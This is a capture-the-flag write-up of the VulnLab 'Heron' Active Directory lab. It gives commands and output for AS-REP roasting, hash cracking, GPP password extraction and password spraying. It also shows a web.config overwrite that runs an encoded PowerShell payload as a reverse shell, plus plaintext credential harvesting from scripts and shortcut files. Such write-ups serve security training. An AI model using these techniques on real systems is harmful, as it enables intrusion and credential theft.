Post

VulnLab Heron

VulnLab Heron

VulnLab Heron

Heron

This is an assumed breach scenario. Heron Corp created a low-privileged local user account on a jump server for you.

1
pentest:Heron123!

Attack Chain

frajmp.heron.vl

1
2
└─$ sshpass -p 'Heron123!' ssh -D 1080 pentest@10.10.249.118
****************************************************

We know that DC’s IP, but we can also check it using arp

1
2
3
pentest@frajmp:~$ arp -a
? (10.10.249.113) at 0a:3d:6c:d2:9d:9d [ether] on ens5
? (10.10.249.117) at 0a:84:28:b7:6e:51 [ether] on ens5

We see that the jump server is domain joined

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
pentest@frajmp:~$ ls -lha /home
total 24K
drwxr-xr-x  6 root                          root                  4.0K Jun  6  2024 .
drwxr-xr-x 19 root                          root                  4.0K May 25  2024 ..
drwxr-x---  4 _local                        _local                4.0K May 26  2024 _local
drwxr-x---  4 pentest                       pentest               4.0K Jun  4  2024 pentest
drwx------  4 svc-web-accounting-d@heron.vl domain users@heron.vl 4.0K Jun  6  2024 svc-web-accounting-d@heron.vl
drwx------  3 svc-web-accounting@heron.vl   domain users@heron.vl 4.0K Jun  6  2024 svc-web-accounting@heron.vl
pentest@frajmp:~$ cat /etc/krb5.conf 
[libdefaults]
udp_preference_limit = 0
default_realm = HERON.VL
dns_lookup_realm = false
dns_lookup_kdc = true
ticket_lifetime = 72h
kdc_timesync = 1
ccache_type = 4
forwardable = true
proxiable = true
fcc-mit-ticketflags = true
dns_canonicalize_hostname = false


[realms]
    HERON.VL = {
        kdc = mucdc.heron.vl
        admin_server = mucdc.heron.vl
    }

[domain_realm]
    .heron.vl = HERON.VL
    heron.vl = HERON.VL

Let’s enumerate DC. We can upload port scanner and scan ports or setup tunnel with ligolo (socks tunnel with chisel) to perform scan froum our host.

1
2
└─$ rustscan -g -a 10.10.249.117 -r 1-65535
10.10.249.117 -> [53,80,88,139,135,389,464,445,636,593,49667,49664,49669,51005,51028]

No results with Guest and anonymous account.

1
2
3
└─$ proxychains -q nxc smb 10.10.249.117 -u 'Guest' -p ''   
SMB         10.10.249.117   445    MUCDC            [*] Windows Server 2022 Standard 20348 x64 (name:MUCDC) (domain:heron.vl) (signing:True) (SMBv1:True)
SMB         10.10.249.117   445    MUCDC            [-] heron.vl\Guest: STATUS_ACCOUNT_DISABLED
1
2
3
4
└─$ nxc smb 10.10.249.117 -u '' -p '' --shares
SMB         10.10.249.117   445    MUCDC            [*] Windows Server 2022 Standard 20348 x64 (name:MUCDC) (domain:heron.vl) (signing:True) (SMBv1:True)
SMB         10.10.249.117   445    MUCDC            [+] heron.vl\: 
SMB         10.10.249.117   445    MUCDC            [-] Error enumerating shares: STATUS_ACCESS_DENIED

Same goes for LDAP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
└─$ ldapsearch -x -H ldap://10.10.249.117 -b 'DC=heron,DC=vl'   
# extended LDIF
#
# LDAPv3
# base <DC=heron,DC=vl> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090C78, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v4f7c

# numResponses: 1

We saw port 80 open, let’s check it

We have potential usernames

Since we have usernames, we can try if any of the users is vulnerable to ASREProasting

1
2
3
4
5
svc-web-accounting-d
svc-web-accounting
wayne.wood
julian.pratt
samuel.davies
1
2
3
4
5
6
7
8
9
└─$ GetNPUsers.py -usersfile usernames.txt -outputfile asrep.hash -request -format hashcat -dc-host mucdc.heron.vl heron.vl/
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] User svc-web-accounting-d doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc-web-accounting doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User wayne.wood doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User julian.pratt doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$samuel.davies@HERON.VL:281da8f314c743bf5829a27a6c9bbccd$aec488de9f38464bcf990527f17269f1855e9e694fecd512e83a619d5b037f9a8b7067c4d49677bcae4c9c54889180916743259841be1704225e8fc1c7c3ddaa7ee3ccae4d8f91fd864e3a1ec4aa1f937ec4f66b14e04381f652a7bb4a6d522d7339f89072ec20e6dde8d1a9e49772ae80082360ff0e6755a6a4171fc8d6be20f092939cbe5dc393fd7b53300d6cc6545a549364e301ea7108a214f00bf5c5f29f3268c936b533b0cdaa971f29f9bad6cdecb52cd613ac1749fe437c9bfe42113a1fdc7f494ec39df2998ea29285d3e144d5b25a3b8ae6b3d126e0db89b2295a223ab71e

Let’s crack it

1
2
3
4
5
└─$ hashcat -m 18200 -a 0 asrep.hash /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting
<SNIP>
$krb5asrep$23$samuel.davies@HERON.VL:38967f76a8407b114e36bcb5ecfdd097$78953317eda1be13519d082481b2c896ddd1e7ce6dfc20c421ecb9209e63124b52d6bdc2343b48d8d785405e5249e31b7180523442f3234b5442faa9de6eb6959369d5406e78c2433f939ca2ba3a3e6381ef3b5d19a64b4a9f9f7bd9ef02449e5858c010181bb47e7b62c59303e05d44b587eb2997ce478f488d65801fd3fab009cc88578907716fba97d3bceb21c503f409129032fb4c4a43d1b4d8f0ca43e307b829d9cbb87333f27a966eafd8107353b15a06de86342517538f2f6e56001778a97ccc5593bf64494e42d9c419a531b1e5a7618e5f01770b88274e7ff46662a11b7549:<REDACTED>
<SNIP>
1
2
3
└─$ nxc smb 10.10.249.117 -u samuel.davies -p '<REDACTED>'
SMB         10.10.249.117   445    MUCDC            [*] Windows Server 2022 Standard 20348 x64 (name:MUCDC) (domain:heron.vl) (signing:True) (SMBv1:True)
SMB         10.10.249.117   445    MUCDC            [+] heron.vl\samuel.davies:<REDACTED>

Now we can dump domain information using bloodhound

1
2
3
└─$ bloodhound-python -d 'heron.vl' -u samuel.davies -p '<REDACTED>' -c all -ns 10.10.249.117 --zip   
INFO: Found AD domain: heron.vl
<SNIP>

While it’s running we can enumerate shares

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
└─$ nxc smb 10.10.249.117 -u samuel.davies -p '<REDACTED>' --shares
SMB         10.10.249.117   445    MUCDC            [*] Windows Server 2022 Standard 20348 x64 (name:MUCDC) (domain:heron.vl) (signing:True) (SMBv1:True)
SMB         10.10.249.117   445    MUCDC            [+] heron.vl\samuel.davies:<REDACTED> 
SMB         10.10.249.117   445    MUCDC            [*] Enumerated shares
SMB         10.10.249.117   445    MUCDC            Share           Permissions     Remark
SMB         10.10.249.117   445    MUCDC            -----           -----------     ------
SMB         10.10.249.117   445    MUCDC            accounting$                     
SMB         10.10.249.117   445    MUCDC            ADMIN$                          Remote Admin
SMB         10.10.249.117   445    MUCDC            C$                              Default share
SMB         10.10.249.117   445    MUCDC            CertEnroll      READ            Active Directory Certificate Services share
SMB         10.10.249.117   445    MUCDC            home$           READ            
SMB         10.10.249.117   445    MUCDC            IPC$                            Remote IPC
SMB         10.10.249.117   445    MUCDC            it$                             
SMB         10.10.249.117   445    MUCDC            NETLOGON        READ            Logon server share 
SMB         10.10.249.117   445    MUCDC            SYSVOL          READ            Logon server share 
SMB         10.10.249.117   445    MUCDC            transfer$       READ,WRITE 

There’s also user with SPN

1
2
3
4
5
6
7
8
9
10
11
└─$ GetUserSPNs.py heron.vl/samuel.davies:'<REDACTED>' -dc-ip 10.10.249.117 -request
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

ServicePrincipalName       Name                MemberOf                          PasswordLastSet             LastLogon                   Delegation 
-------------------------  ------------------  --------------------------------  --------------------------  --------------------------  ----------
accounting/mucdc.heron.vl  svc-web-accounting  CN=audit,CN=Users,DC=heron,DC=vl  2024-06-01 20:07:44.428061  2025-01-14 20:32:21.813571             



[-] CCache file is not found. Skipping...
<SNIP>

svc-web-accounting happens to have GenericWrite over MUCJMLP machine

We can enumerate shares using nxc spider modules

1
└─$ nxc smb 10.10.249.117 -u samuel.davies -p '<REDACTED>' -M spider_plus -o EXCLUDE_DIR=IPC$  

We find Groups.xml which is GPP password

We can retrieve it

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
└─$ nxc smb 10.10.249.117 -u samuel.davies -p '<REDACTED>' -M gpp_password                   
SMB         10.10.249.117   445    MUCDC            [*] Windows Server 2022 Standard 20348 x64 (name:MUCDC) (domain:heron.vl) (signing:True) (SMBv1:True)
SMB         10.10.249.117   445    MUCDC            [+] heron.vl\samuel.davies:<REDACTED> 
SMB         10.10.249.117   445    MUCDC            [*] Enumerated shares
SMB         10.10.249.117   445    MUCDC            Share           Permissions     Remark
SMB         10.10.249.117   445    MUCDC            -----           -----------     ------
SMB         10.10.249.117   445    MUCDC            accounting$                     
SMB         10.10.249.117   445    MUCDC            ADMIN$                          Remote Admin
SMB         10.10.249.117   445    MUCDC            C$                              Default share
SMB         10.10.249.117   445    MUCDC            CertEnroll      READ            Active Directory Certificate Services share
SMB         10.10.249.117   445    MUCDC            home$           READ            
SMB         10.10.249.117   445    MUCDC            IPC$                            Remote IPC
SMB         10.10.249.117   445    MUCDC            it$                             
SMB         10.10.249.117   445    MUCDC            NETLOGON        READ            Logon server share 
SMB         10.10.249.117   445    MUCDC            SYSVOL          READ            Logon server share 
SMB         10.10.249.117   445    MUCDC            transfer$       READ,WRITE      
GPP_PASS... 10.10.249.117   445    MUCDC            [+] Found SYSVOL share
GPP_PASS... 10.10.249.117   445    MUCDC            [*] Searching for potential XML files containing passwords
SMB         10.10.249.117   445    MUCDC            [*] Started spidering
SMB         10.10.249.117   445    MUCDC            [*] Spidering .
SMB         10.10.249.117   445    MUCDC            //10.10.249.117/SYSVOL/heron.vl/Policies/{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}/Machine/Preferences/Groups/Groups.xml [lastm:'2024-06-04 21:01' size:1135]
SMB         10.10.249.117   445    MUCDC            [*] Done spidering (Completed in 11.940693378448486)
GPP_PASS... 10.10.249.117   445    MUCDC            [*] Found heron.vl/Policies/{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}/Machine/Preferences/Groups/Groups.xml
GPP_PASS... 10.10.249.117   445    MUCDC            [+] Found credentials in heron.vl/Policies/{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}/Machine/Preferences/Groups/Groups.xml
GPP_PASS... 10.10.249.117   445    MUCDC            Password: <REDACTED>
GPP_PASS... 10.10.249.117   445    MUCDC            action: U
GPP_PASS... 10.10.249.117   445    MUCDC            newName: _local
GPP_PASS... 10.10.249.117   445    MUCDC            fullName: 
GPP_PASS... 10.10.249.117   445    MUCDC            description: local administrator
GPP_PASS... 10.10.249.117   445    MUCDC            changeLogon: 0
GPP_PASS... 10.10.249.117   445    MUCDC            noChange: 0
GPP_PASS... 10.10.249.117   445    MUCDC            neverExpires: 1
GPP_PASS... 10.10.249.117   445    MUCDC            acctDisabled: 0
GPP_PASS... 10.10.249.117   445    MUCDC            subAuthority: RID_ADMIN
GPP_PASS... 10.10.249.117   445    MUCDC            userName: Administrator (built-in)

We can try spraying this password

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
└─$ nxc smb 10.10.249.117 -u users.txt -p '<REDACTED>' --continue-on-success 
SMB         10.10.249.117   445    MUCDC            [*] Windows Server 2022 Standard 20348 x64 (name:MUCDC) (domain:heron.vl) (signing:True) (SMBv1:True)
SMB         10.10.249.117   445    MUCDC            [-] heron.vl\_admin:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.249.117   445    MUCDC            [-] heron.vl\krbtgt:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.249.117   445    MUCDC            [-] heron.vl\Katherine.Howard:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.249.117   445    MUCDC            [-] heron.vl\Rachael.Boyle:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.249.117   445    MUCDC            [-] heron.vl\Anthony.Goodwin:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.249.117   445    MUCDC            [-] heron.vl\Carol.John:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.249.117   445    MUCDC            [-] heron.vl\Rosie.Evans:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.249.117   445    MUCDC            [-] heron.vl\Adam.Harper:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.249.117   445    MUCDC            [-] heron.vl\Adam.Matthews:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.249.117   445    MUCDC            [-] heron.vl\Steven.Thomas:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.249.117   445    MUCDC            [-] heron.vl\Amanda.Williams:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.249.117   445    MUCDC            [-] heron.vl\Vanessa.Anderson:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.249.117   445    MUCDC            [-] heron.vl\Jane.Richards:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.249.117   445    MUCDC            [-] heron.vl\Rhys.George:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.249.117   445    MUCDC            [-] heron.vl\Mohammed.Parry:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.249.117   445    MUCDC            [-] heron.vl\Julian.Pratt:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.249.117   445    MUCDC            [-] heron.vl\Wayne.Wood:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.249.117   445    MUCDC            [-] heron.vl\Danielle.Harrison:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.249.117   445    MUCDC            [-] heron.vl\Samuel.Davies:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.249.117   445    MUCDC            [-] heron.vl\Alice.Hill:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.249.117   445    MUCDC            [-] heron.vl\Jayne.Johnson:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.249.117   445    MUCDC            [-] heron.vl\Geraldine.Powell:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.249.117   445    MUCDC            [-] heron.vl\adm_hoka:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.249.117   445    MUCDC            [-] heron.vl\adm_prju:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.249.117   445    MUCDC            [-] heron.vl\svc-web-accounting:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.249.117   445    MUCDC            [+] heron.vl\svc-web-accounting-d:<REDACTED>

We have valid creds svc-web-accounting-d:<REDACTED> which can has access to ssh. Now we have READ,WRITE privileges on accounting$ share

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
└─$ nxc smb 10.10.249.117 -u svc-web-accounting-d -p '<REDACTED>' --shares
SMB         10.10.249.117   445    MUCDC            [*] Windows Server 2022 Standard 20348 x64 (name:MUCDC) (domain:heron.vl) (signing:True) (SMBv1:True)
SMB         10.10.249.117   445    MUCDC            [+] heron.vl\svc-web-accounting-d:<REDACTED> 
SMB         10.10.249.117   445    MUCDC            [*] Enumerated shares
SMB         10.10.249.117   445    MUCDC            Share           Permissions     Remark
SMB         10.10.249.117   445    MUCDC            -----           -----------     ------
SMB         10.10.249.117   445    MUCDC            accounting$     READ,WRITE      
SMB         10.10.249.117   445    MUCDC            ADMIN$                          Remote Admin
SMB         10.10.249.117   445    MUCDC            C$                              Default share
SMB         10.10.249.117   445    MUCDC            CertEnroll      READ            Active Directory Certificate Services share
SMB         10.10.249.117   445    MUCDC            home$           READ            
SMB         10.10.249.117   445    MUCDC            IPC$                            Remote IPC
SMB         10.10.249.117   445    MUCDC            it$                             
SMB         10.10.249.117   445    MUCDC            NETLOGON        READ            Logon server share 
SMB         10.10.249.117   445    MUCDC            SYSVOL          READ            Logon server share 
SMB         10.10.249.117   445    MUCDC            transfer$       READ,WRITE  

Looks like it’s a web application directory. We can see web.config there

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
└─$ smbclient.py svc-web-accounting-d:'<REDACTED>'@10.10.249.117
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Type help for list of commands
# use accounting$
# ls
drw-rw-rw-          0  Tue Jan 14 21:19:36 2025 .
drw-rw-rw-          0  Sun Jun  2 20:26:14 2024 ..
-rw-rw-rw-      37407  Fri Jun  7 11:13:32 2024 AccountingApp.deps.json
-rw-rw-rw-      89600  Fri Jun  7 11:13:32 2024 AccountingApp.dll
-rw-rw-rw-     140800  Fri Jun  7 11:13:32 2024 AccountingApp.exe
-rw-rw-rw-      39488  Fri Jun  7 11:13:32 2024 AccountingApp.pdb
-rw-rw-rw-        557  Fri Jun  7 11:13:32 2024 AccountingApp.runtimeconfig.json
-rw-rw-rw-        127  Fri Jun  7 11:13:32 2024 appsettings.Development.json
-rw-rw-rw-        237  Fri Jun  7 11:13:32 2024 appsettings.json
-rw-rw-rw-     106496  Fri Jun  7 11:13:32 2024 FinanceApp.db
-rw-rw-rw-      53920  Fri Jun  7 11:13:32 2024 Microsoft.AspNetCore.Authentication.Negotiate.dll
-rw-rw-rw-      52912  Fri Jun  7 11:13:32 2024 Microsoft.AspNetCore.Cryptography.Internal.dll
-rw-rw-rw-      23712  Fri Jun  7 11:13:32 2024 Microsoft.AspNetCore.Cryptography.KeyDerivation.dll
-rw-rw-rw-     108808  Fri Jun  7 11:13:32 2024 Microsoft.AspNetCore.Identity.EntityFrameworkCore.dll
-rw-rw-rw-     172992  Fri Jun  7 11:13:32 2024 Microsoft.Data.Sqlite.dll
-rw-rw-rw-      34848  Fri Jun  7 11:13:32 2024 Microsoft.EntityFrameworkCore.Abstractions.dll
-rw-rw-rw-    2533312  Fri Jun  7 11:13:32 2024 Microsoft.EntityFrameworkCore.dll
-rw-rw-rw-    1991616  Fri Jun  7 11:13:32 2024 Microsoft.EntityFrameworkCore.Relational.dll
-rw-rw-rw-     257456  Fri Jun  7 11:13:32 2024 Microsoft.EntityFrameworkCore.Sqlite.dll
-rw-rw-rw-      79624  Fri Jun  7 11:13:32 2024 Microsoft.Extensions.DependencyModel.dll
-rw-rw-rw-     177840  Fri Jun  7 11:13:32 2024 Microsoft.Extensions.Identity.Core.dll
-rw-rw-rw-      45232  Fri Jun  7 11:13:32 2024 Microsoft.Extensions.Identity.Stores.dll
-rw-rw-rw-      64776  Fri Jun  7 11:13:32 2024 Microsoft.Extensions.Options.dll
drw-rw-rw-          0  Fri Jun  7 11:13:32 2024 runtimes
-rw-rw-rw-       5120  Fri Jun  7 11:13:32 2024 SQLitePCLRaw.batteries_v2.dll
-rw-rw-rw-      50688  Fri Jun  7 11:13:32 2024 SQLitePCLRaw.core.dll
-rw-rw-rw-      35840  Fri Jun  7 11:13:32 2024 SQLitePCLRaw.provider.e_sqlite3.dll
-rw-rw-rw-      71944  Fri Jun  7 11:13:32 2024 System.DirectoryServices.Protocols.dll
-rw-rw-rw-        554  Fri Jun  7 11:14:04 2024 web.config
drw-rw-rw-          0  Fri Jun  7 11:13:32 2024 wwwroot

Seems like there’s accounting vhost

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
└─$ ffuf -u 'http://heron.vl' -H 'Host: FUZZ.heron.vl' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -fs 4128 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://heron.vl
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
 :: Header           : Host: FUZZ.heron.vl
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 4128
________________________________________________

accounting              [Status: 401, Size: 0, Words: 1, Lines: 1, Duration: 1055ms]

We have write permissions, so we can change web.config file to achieve RCE

1
2
3
4
5
6
7
8
9
10
11
12
13
<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <location path="." inheritInChildApplications="false">
    <system.webServer>
      <handlers>
        <add name="aspNetCore" path="rce" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
      </handlers>
      <aspNetCore processPath="powershell" arguments="-e <BASE64_PAYLOAD>" stdoutLogEnabled="false" stdoutLogFile=".\logs\stdout" hostingModel="OutOfProcess" />
    </system.webServer>
  </location>
</configuration>
<!--ProjectGuid: 803424B4-7DFD-4F1E-89C7-4AAC782C27C4-->

After testing it multiple times, seems like DC won’t be able to access our attack box (forgot about chain description). We can deploy netcat listener on jump host and receive reverse shell, or configure remote port forwarding to do it

1
2
└─$ sshpass -p '<REDACTED>' ssh 'svc-web-accounting-d@heron.vl'@10.10.249.118 -R 9000:127.0.0.1:9000
****************************************************

Generate payload using revshells.com pointing to Now we replace file

1
2
3
# rm web.config
# put web.config

When we visit http://accounting.heron.vl/rce, we should receive connection

1
2
3
4
5
pentest@frajmp:~$ nc -lvnp 6666
Listening on 0.0.0.0 6666
Connection received on 10.10.245.117 57463

PS C:\webaccounting> 

During enumeration we find interesting folder with scripts, which contains ssh credentials

1
2
3
4
5
6
7
8
9
10
PS C:\> ls windows\scripts


    Directory: C:\windows\scripts


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----          6/6/2024   7:12 AM           1416 dns.ps1                                                              
-a----          6/1/2024   8:26 AM            221 ssh.ps1                                                              
1
2
3
4
5
6
PS C:\> cat windows\scripts\ssh.ps1
$plinkPath = "C:\Program Files\PuTTY\plink.exe"
$targetMachine = "frajmp"
$user = "_local"
$password = "<REDACTED>"
& "$plinkPath" -ssh -batch $user@$targetMachine -pw $password "ps auxf; ls -lah /home; exit"

Seems like credentials to frajmp machine. Credentials work and we get root privileges due to sudo

1
2
3
4
5
6
7
8
9
10
pentest@frajmp:~$ su _local
Password: 
_local@frajmp:/home/pentest$ sudo -l
[sudo] password for _local: 
Matching Defaults entries for _local on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User _local may run the following commands on localhost:
    (ALL : ALL) ALL

MUCDC.heron.vl

If we try spraying the password against users, we have a hit for Julian.Pratt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
└─$ nxc smb 10.10.245.117 -u users.txt -p '<REDACTED>' --continue-on-success

SMB         10.10.245.117   445    MUCDC            [*] Windows Server 2022 Standard 20348 x64 (name:MUCDC) (domain:heron.vl) (signing:True) (SMBv1:True)
SMB         10.10.245.117   445    MUCDC            [-] heron.vl\_admin:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.245.117   445    MUCDC            [-] heron.vl\krbtgt:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.245.117   445    MUCDC            [-] heron.vl\Katherine.Howard:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.245.117   445    MUCDC            [-] heron.vl\Rachael.Boyle:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.245.117   445    MUCDC            [-] heron.vl\Anthony.Goodwin:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.245.117   445    MUCDC            [-] heron.vl\Carol.John:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.245.117   445    MUCDC            [-] heron.vl\Rosie.Evans:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.245.117   445    MUCDC            [-] heron.vl\Adam.Harper:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.245.117   445    MUCDC            [-] heron.vl\Adam.Matthews:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.245.117   445    MUCDC            [-] heron.vl\Steven.Thomas:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.245.117   445    MUCDC            [-] heron.vl\Amanda.Williams:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.245.117   445    MUCDC            [-] heron.vl\Vanessa.Anderson:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.245.117   445    MUCDC            [-] heron.vl\Jane.Richards:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.245.117   445    MUCDC            [-] heron.vl\Rhys.George:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.245.117   445    MUCDC            [-] heron.vl\Mohammed.Parry:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.245.117   445    MUCDC            [+] heron.vl\Julian.Pratt:<REDACTED> 
SMB         10.10.245.117   445    MUCDC            [-] heron.vl\Wayne.Wood:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.245.117   445    MUCDC            [-] heron.vl\Danielle.Harrison:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.245.117   445    MUCDC            [-] heron.vl\Samuel.Davies:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.245.117   445    MUCDC            [-] heron.vl\Alice.Hill:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.245.117   445    MUCDC            [-] heron.vl\Jayne.Johnson:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.245.117   445    MUCDC            [-] heron.vl\Geraldine.Powell:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.245.117   445    MUCDC            [-] heron.vl\adm_hoka:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.245.117   445    MUCDC            [-] heron.vl\adm_prju:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.245.117   445    MUCDC            [-] heron.vl\svc-web-accounting:<REDACTED> STATUS_LOGON_FAILURE 
SMB         10.10.245.117   445    MUCDC            [-] heron.vl\svc-web-accounting-d:<REDACTED> STATUS_LOGON_FAILURE 

Nothing new in shares

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
└─$ nxc smb 10.10.245.117 -u Julian.Pratt -p '<REDACTED>' --shares 

SMB         10.10.245.117   445    MUCDC            [*] Windows Server 2022 Standard 20348 x64 (name:MUCDC) (domain:heron.vl) (signing:True) (SMBv1:True)
SMB         10.10.245.117   445    MUCDC            [+] heron.vl\Julian.Pratt:<REDACTED> 
SMB         10.10.245.117   445    MUCDC            [*] Enumerated shares
SMB         10.10.245.117   445    MUCDC            Share           Permissions     Remark
SMB         10.10.245.117   445    MUCDC            -----           -----------     ------
SMB         10.10.245.117   445    MUCDC            accounting$                     
SMB         10.10.245.117   445    MUCDC            ADMIN$                          Remote Admin
SMB         10.10.245.117   445    MUCDC            C$                              Default share
SMB         10.10.245.117   445    MUCDC            CertEnroll      READ            Active Directory Certificate Services share
SMB         10.10.245.117   445    MUCDC            home$           READ            
SMB         10.10.245.117   445    MUCDC            IPC$                            Remote IPC
SMB         10.10.245.117   445    MUCDC            it$                             
SMB         10.10.245.117   445    MUCDC            NETLOGON        READ            Logon server share 
SMB         10.10.245.117   445    MUCDC            SYSVOL          READ            Logon server share 
SMB         10.10.245.117   445    MUCDC            transfer$       READ,WRITE 

But we find interesting files in his home directory

1
2
3
4
5
6
7
8
# cd Julian.Pratt
# ls
drw-rw-rw-          0  Fri Jun  7 15:41:06 2024 .
drw-rw-rw-          0  Fri Jun  7 15:37:33 2024 ..
-rw-rw-rw-       1443  Fri Jun  7 15:41:06 2024 frajmp.lnk
-rw-rw-rw-        117  Fri Jun  7 15:41:06 2024 Is there a way to -auto login- in PuTTY with a password- - Super User.url
-rw-rw-rw-       2312  Fri Jun  7 15:41:06 2024 Microsoft Edge.lnk
-rw-rw-rw-       1441  Fri Jun  7 15:41:06 2024 mucjmp.lnk

We can see that frajmp.lnk contains _local password we use

1
2
3
4
5
6
7
8
9
10
11
└─$ cat frajmp.lnk            
2t▒`��ف+B�� �gP�O� �:i�+00�/C:\�1�X�sPROGRA~1t  ᄄR�B�X�s.BJz
AProgram Files@shell32.dll,-21781▒P1�X�[PuTTY<  ᄎX�[�X�[.���PuTTY\2 ��X�� putty.exeD    ニX���X�[.putty.exe▒O-N�h�ZC:\Program Files\PuTTY\putty.exe#..\..\Program Files\PuTTY\putty.exeC:\Program Files\PuTTY%_local@frajmp -pw <REDACTED>�&�
         ��c^���NI��e�2��▒�`�Xmucdc>i�Y
                                       �M�A���ϻg~�:N��
                                                      )BtP>i�Y
                                                              �M�A���ϻg~�:N��
                                                                             )BtPM      �a1SPS�0��C�G����sf"EdPuTTY (C:\Program Files)�1SPS��XF�L8C���&�m�q0S-1-5-21-1568358163-2901064146-3316491674-24588�1SPS0�%��G▒��`����%

putty.exe@ف+B��
                �)

Here we have potential creds for adm_prju

1
2
3
4
5
6
7
8
9
10
11
└─$ cat mucjmp.lnk 
2t▒`��ف+B�� �gP�O� �:i�+00�/C:\�1�X�sPROGRA~1t  ᄄR�B�X�s.BJz
AProgram Files@shell32.dll,-21781▒P1�X�[PuTTY<  ᄎX�[�X�[.���PuTTY\2 ��X�� putty.exeD    ニX���X�[.putty.exe▒O-N�h�ZC:\Program Files\PuTTY\putty.exe#..\..\Program Files\PuTTY\putty.exeC:\Program Files\PuTTY$adm_prju@mucjmp -pw <REDACTED>�&�
